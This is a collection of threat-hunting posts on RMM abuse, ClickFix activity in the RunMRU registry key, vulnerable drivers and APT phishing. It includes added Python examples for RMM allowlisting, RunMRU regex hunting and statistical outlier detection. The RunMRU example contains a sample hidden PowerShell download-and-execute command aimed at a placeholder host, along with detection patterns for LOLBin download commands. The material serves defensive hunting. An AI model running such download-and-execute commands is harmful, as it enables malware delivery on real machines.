Latest Dispatch: HEARTH
HEARTH (Hunting Exchange and Research Threat Hub) is an open-source project for sharing and refining threat hunting ideas.
Learn what it is and how to contribute: https://dispatch.thorcollective.com/p/introducing-hearth
@deepthoughts10 @threatinsight Bluetrait doesn’t appear to be on LOLRMM yet, I’ll try to submit it for addition.
Further to Brian’s excellent recommendation, I strongly recommend taking all the LOLRMM domains and file installation paths, running a baseline search against your environment, identifying/allowlisting the authorized RMM solutions in use, and hard-blocking the rest. Since most TAs use the legitimate stock binaries, security teams can score quick wins with this method.
Work with your IT helpdesk teams to identify which RMM tool they use when you inevitably start seeing RMM usage in your logs. RMM usage is unfortunately more prevalent than one would guess, malicious or not. Think third-party vendor troubleshooting calls, rogue employee installs, and random drive-by RMM connections when users search for help via their favorite search engine.
Finally, don’t count out remote session takeovers using MS Teams, Zoom, and other collaboration tools. DPRK remote IT workers will use this functionality to remotely control devices they aren’t sitting in front of. Recommend checking your org’s official collab tool of choice for remote control functionality and turning it off at the org level, if possible. Otherwise, detection engineering for use and abuse of a legitimate application feature used by thousands in your org is like searching for needles in the proverbial haystack.
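The baseline-and-allowlist approach from the post above, as an added example (not from the original thread or the LOLRMM project): a constructed, simplified RMM inventory (not LOLRMM's real schema), an assumed allowlist of helpdesk-approved tools, and constructed process and DNS events are matched to surface RMM activity that is not authorized.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed, simplified inventory in the spirit of LOLRMM (tool -> binaries, domains).
# Not LOLRMM's real schema or data; use the project's own entries in production.
RMM_INVENTORY: Dict[str, Dict[str, List[str]]] = {
    "TeamViewer": {"binaries": ["teamviewer.exe", "teamviewer_service.exe"],
                   "domains": ["teamviewer.com"]},
    "AnyDesk": {"binaries": ["anydesk.exe"], "domains": ["anydesk.com"]},
}
# Tools the helpdesk confirmed as sanctioned for this environment (assumption).
AUTHORIZED = {"TeamViewer"}

# Constructed process-creation and DNS events in a simple key=value shape.
SAMPLE_EVENTS = [
    r'2025-03-03T10:01:02Z host=ws01 type=process image="C:\Program Files (x86)\TeamViewer\TeamViewer.exe"',
    r'2025-03-03T10:02:10Z host=ws02 type=dns query=relay.anydesk.com',
    r'2025-03-03T10:04:00Z host=ws01 type=dns query=www.example.com',
    r'2025-03-03T10:05:31Z host=ws03 type=process image="C:\Windows\System32\notepad.exe"',
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line: str) -> Dict[str, str]:
    return {k: v.strip('"') for k, v in KV.findall(line)}

def classify(event: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (tool, indicator) if the event touches a known RMM binary or domain."""
    if event.get("type") == "process":
        exe = event.get("image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
        for tool, ind in RMM_INVENTORY.items():
            if exe in ind["binaries"]:
                return tool, exe
    elif event.get("type") == "dns":
        q = event.get("query", "").lower().rstrip(".")
        for tool, ind in RMM_INVENTORY.items():
            if any(q == d or q.endswith("." + d) for d in ind["domains"]):
                return tool, q
    return None

def baseline(lines: List[str]) -> List[Tuple[str, str, str, bool]]:
    """Every RMM sighting as (host, tool, indicator, authorized) for the baseline review."""
    out = []
    for line in lines:
        ev = parse_event(line)
        hit = classify(ev)
        if hit:
            out.append((ev.get("host", "?"), hit[0], hit[1], hit[0] in AUTHORIZED))
    return out

def unauthorized(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Sightings of RMM tools not on the allowlist: candidates for blocking or a helpdesk ticket."""
    return [(h, t, i) for h, t, i, ok in baseline(lines) if not ok]
```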
New Dispatch Drop
Attackers will get in—just give them time.
In this week's THOR Collective Dispatch, we talk why security teams must test their defenses: https://dispatch.thorcollective.com/p/why-cybersecurity-teams-need-to-test
Hunt for the stupidest things imaginable and you will be victorious. #threathunting
Fridays used to be relaxing. Now they're spent wondering how to build ad hoc tables in LogScale so I can explain why cmd - leads to a multi-stage malware deployment.
#crowdstrike #threathunting
At SCinet 2024, Eldon Koyle, Principal Technical Marketing Engineer at Corelight, was threat hunting using data from Corelight sensors in one of the fastest, most open research networks ever created.
His key takeaway? Context is everything.
In high-speed environments, security teams can’t rely solely on alerts. They need data that paints a clearer picture of any suspicious behavior on the network. Enriched network logs provide critical visibility, helping threat hunters connect the dots and make more informed decisions in real time.
With vast amounts of data moving across the network, how do you ensure your security team has the visibility needed to identify and assess threats before they escalate? Read Eldon’s full insight in his latest blog: https://corelight.com/blog/threat-hunting-at-scinet-24?utm_source=msdtn&utm_medium=organic-social&utm_campaign=blog&utm_adgroup=SCinet2024&utm_content=quote
PowerShell tools to help defenders hunt smarter, hunt harder
Whenever you run something inside a Windows Run dialog box, apparently it gets saved to the registry under the RunMRU key.
This can be helpful for those of you hunting for ClickFix / ClearFake campaign activity since anything executed after the run dialog has a better chance of blending into benign activity.
Building regex patterns on the registry key values can help uncover any malicious commands with multiple arguments.
#clickfix #clearfake #threathunting
https://forensafe.com/blogs/runmrukey.html
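The regex-over-RunMRU hunt described above, as an added example (not from the original post or the linked article): a constructed dict mimicking an exported RunMRU key is put back into most-recent-first order via MRUList, the trailing "\1" marker is stripped, and each command is run through detection patterns for the multi-argument PowerShell/LOLBin shapes the post refers to. The pattern names and sample values are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample mimicking HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
# slots are single letters, data is the typed command followed by "\1",
# and MRUList orders the slots most-recent-first.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -nop -c "iwr http://example.invalid/x | iex"\\1',
    "c": "calc\\1",
}

# Detection patterns (constructed): each targets a command shape, not a specific campaign.
SUSPICIOUS = {
    "ps_hidden_or_bypass": re.compile(
        r"(?i)\bpowershell(?:\.exe)?\b.*?(?:-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass"
        r"|-e(?:nc(?:odedcommand)?|c)?\s+[A-Za-z0-9+/=]{8,})"),
    "ps_download_exec": re.compile(
        r"(?i)\b(?:iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b"),
    "mshta_url": re.compile(r"(?i)\bmshta(?:\.exe)?\b.*?https?://"),
    "lolbin_url": re.compile(
        r"(?i)\b(?:curl|certutil|bitsadmin|wscript|cscript|regsvr32)\b.*?https?://"),
    "cmd_chain": re.compile(
        r"(?i)\bcmd(?:\.exe)?\b.*?/c\b.*?\b(?:powershell|mshta|curl|certutil)\b"),
}

def parse_runmru(values: Dict[str, str]) -> List[dict]:
    """RunMRU entries ordered most-recent-first, with the trailing '\\1' stripped."""
    order = list(values.get("MRUList", ""))
    order += [k for k in values if k != "MRUList" and k not in order]  # slots absent from MRUList
    entries = []
    for slot in order:
        data = values.get(slot)
        if data is None:
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        entries.append({"slot": slot, "command": cmd})
    return entries

def hunt_runmru(values: Dict[str, str]) -> List[dict]:
    """Annotate each entry with the names of the patterns it matches."""
    entries = parse_runmru(values)
    for e in entries:
        e["hits"] = [name for name, rx in SUSPICIOUS.items() if rx.search(e["command"])]
    return entries

def flagged(values: Dict[str, str]) -> List[dict]:
    return [e for e in hunt_runmru(values) if e["hits"]]
```

On a live host the same dict can be built from the key with winreg, or from a parsed NTUSER.DAT hive during forensics.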
New THOR Collective Dispatch post
In Part 5 of the DEATHCon Thrunting Workshop series by @jotunvillur.bsky.social and me, we use advanced data analysis to find threats in HTTP datasets.
Full post here: https://dispatch.thorcollective.com/p/a-deathcon-thrunting-workshop-overview-a4b
Looks like X/Twitter Grok has a way to share files now. Could be used to distribute malware. I recommend hunting for this and/or blocking this URL pattern.
From: @GossiTheDog
https://cyberplace.social/@GossiTheDog/114103639865734868
I found this useful Gist when looking up ways to execute commands from ADS. There are more possibilities than I thought.
#threathunting
https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
#BYOVD attacks are slowly becoming more common for threat actors to escalate privilege and kill security tools.
Make sure you're #ThreatHunting for new Vulnerable Drivers!
Win 11 now has a Vulnerable Driver Blocklist feature, however, it's only updated in major updates so you still need to monitor for recently discovered Vulnerable Drivers.
Recent Vuln Driver: https://www.bleepingcomputer.com/news/security/ransomware-gangs-exploit-paragon-partition-manager-bug-in-byovd-attacks/
Known Vuln Drivers: https://www.loldrivers.io/
Vuln Driver Blocklist: https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules
Looking for a fun #CyberSecurity #Infosec project?
Want to practice your #ThreatHunting and #Detection skills?
Install the NEW #SecurityOnion 2.4.120 in a VM:
https://docs.securityonion.net/en/2.4/first-time-users.html
Then follow along with our recent quick #malware analysis posts:
https://blog.securityonion.net/search/label/quick%20malware%20analysis
Good day everyone!
An APT group known as Angry Likho (a.k.a. Sticky Werewolf) is being monitored by Kaspersky's Securelist researchers, and they have identified hundreds of victims of a recent attack in Russia, several in Belarus, and additional incidents in other countries. They used the age-old technique of spear-phishing to gain initial access, with attachments that contained a legitimate bait file as well as other files, in some cases malicious LNK files. Execution would lead to a newly discovered implant named FrameworkSurvivor.exe.
As usual, check out all the juicy details that I left out and enjoy the read! Happy Hunting!
Angry Likho: Old beasts in a new forest
https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Also with that recent 7-Zip vulnerability I've started to pay more attention to what file attributes are visible in archive files.
One note from the link above:
I find .img files to be the best because they don’t require external software for extraction and can effectively hide files. In contrast, opening a ZIP file with WinRAR will reveal hidden files
Then there was this report from Proofpoint in December:
However, if the RAR is opened in 7-Zip, the user can view and extract the NTFS ADS streams on Windows systems (NTFS file formatted system)
https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats
#ThreatHunting #ThreatIntel
Idk what it is about LNK files that makes campaigns so interesting. It's one of those file types that doesn't seem to have direct detections, yet carries a lot of options.
#RedTeam #ThreatHunting
https://lorenzomeacci.com/advanced-initial-access-techniques
Whoa, malware trends in Q1/25 are getting seriously wild! AsyncRAT via TryCloudflare, Lynx Ransomware, Lumma Stealer popping up on GitHub... it's just escalating.
Here's the deal: tons of companies *think* their security is rock solid, but attackers are constantly leveling up their social engineering game – just look at InvisibleFerret. And then, bam! "Oh no, we've been hacked!" rings alarmingly too often.
Frankly, we need more pentests and proactive threat hunting. Automated scans? Sure, they're useful, but they're no substitute for experienced pros. What's your take on these new malware campaigns? What actually works for you?
Tired of getting ghosted by endless events? The five-number summary is your threat-hunting sidekick.
Check out our latest THOR Collective Dispatch for the full breakdown.
Join us: https://dispatch.thorcollective.com/p/stop-chasing-ghosts-how-five-number
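The five-number summary applied to a hunting dataset, as an added example (not from the Dispatch post): constructed per-host daily event counts are reduced to min, Q1, median, Q3 and max using Tukey's hinges, and the IQR fences derived from Q1 and Q3 pick out the hosts worth a closer look instead of the whole event stream.

```python
from typing import Dict, Iterable, List, Tuple

# Constructed per-host counts for one day (e.g. outbound DNS queries per workstation);
# the numbers are made up for illustration.
SAMPLE_COUNTS: Dict[str, int] = {
    "ws01": 120, "ws02": 98, "ws03": 134, "ws04": 110, "ws05": 105, "ws06": 126,
    "ws07": 117, "ws08": 2210, "ws09": 101, "ws10": 115, "ws11": 129, "ws12": 3,
}

def _median(sorted_vals: List[float]) -> float:
    n = len(sorted_vals)
    mid = n // 2
    return sorted_vals[mid] if n % 2 else (sorted_vals[mid - 1] + sorted_vals[mid]) / 2

def five_number(values: Iterable[float]) -> Tuple[float, float, float, float, float]:
    """(min, Q1, median, Q3, max); Q1/Q3 are the medians of the lower and upper halves,
    with the overall median left out of both halves when the count is odd."""
    s = sorted(values)
    if not s:
        raise ValueError("five_number() needs at least one value")
    n = len(s)
    lower, upper = s[: n // 2], s[(n + 1) // 2 :]
    if n == 1:
        lower = upper = s
    return s[0], _median(lower), _median(s), _median(upper), s[-1]

def outliers(counts: Dict[str, int], k: float = 1.5) -> Dict[str, Tuple[int, str]]:
    """Hosts outside [Q1 - k*IQR, Q3 + k*IQR], tagged 'low' (gone quiet) or 'high' (noisy)."""
    _, q1, _, q3, _ = five_number(counts.values())
    iqr = q3 - q1
    lo, hi = q1 - k * iqr, q3 + k * iqr
    return {h: (c, "low" if c < lo else "high")
            for h, c in counts.items() if c < lo or c > hi}
```

Both tails matter: the high outlier is the obvious lead, but a host that suddenly produces almost nothing can mean a sensor was stopped or the machine was isolated.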